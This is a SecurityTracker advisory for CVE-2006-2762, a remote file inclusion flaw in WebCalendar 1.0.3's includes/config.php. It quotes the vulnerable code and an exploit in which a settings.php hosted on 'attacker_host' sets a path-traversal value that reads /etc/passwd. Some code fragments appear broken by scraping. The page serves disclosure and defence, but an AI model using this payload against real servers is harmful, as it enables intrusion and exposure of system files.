Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Calendar)  >   WebCalendar Vendors:   Knudsen, Craig
WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016179
SecurityTracker URL:
CVE Reference:   CVE-2006-2762   (Links to External Site)
Updated:  Aug 25 2009
Original Entry Date:  May 30 2006
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0.3
Description:   A vulnerability was reported in WebCalendar. A remote user can view arbitrary files on the target system.

The 'includes/config.php' script does not properly validate user-supplied input in the 'includedir' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include files from a remote system which will be able to include files from the target system. As a result, the remote user can view arbitrary files with the privileges of the target web service.

Impact:   A remote user can view files on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  WebCalendar-1.0.3 reading of any files

Version:    WebCalendar-1.0.3

Type:       Reading of any files




line  64

if ( ! empty ( $includedir ) ) 

  $fd = @fopen ( "$includedir/settings.php", "rb", true );


while ( ! feof ( $fd ) ) {

  $data .= fgets ( $fd, 4096 );


$configLines = explode ( "\n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {


    $settings[$matches[1]] = $matches[2];


$user_inc = $settings['user_inc'];



include_once "includes/$user_inc";




where in attacker_host exists file settings.php , which content



    echo '<?php

# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300

Unimportant variables can be taken from original settings.php

user_inc: ../../../../../../../../../../../../../../../../etc/passwd

# end settings.php





register_globals = On;


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC